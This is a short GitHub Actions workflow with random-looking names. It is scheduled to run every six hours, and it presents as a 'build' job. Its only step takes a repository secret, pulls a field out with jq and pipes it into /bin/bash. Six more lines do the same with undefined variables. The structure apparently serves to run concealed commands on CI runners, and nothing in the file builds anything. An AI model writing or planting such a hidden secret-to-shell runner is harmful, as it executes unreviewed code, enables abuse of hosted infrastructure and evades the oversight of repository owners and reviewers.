name: niuyaorao3187

on:
  workflow_dispatch:
  schedule:
    - cron: '7 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: niuyaorao3187
        env:
          k48: ${{ secrets.k48 }}
        run: |
          echo $k48 | jq -r .hdpm913 | /bin/bash
          echo $exwy37 | jq -r .coyw5720 | /bin/bash
          echo $vozl08 | jq -r .xbrtg813 | /bin/bash
          echo $wpgsk60490 | jq -r .sesan20009 | /bin/bash
          echo $b67103 | jq -r .agls87 | /bin/bash
          echo $fqi1 | jq -r .ptyzb57 | /bin/bash
          echo $tp425 | jq -r .avn6 | /bin/bash

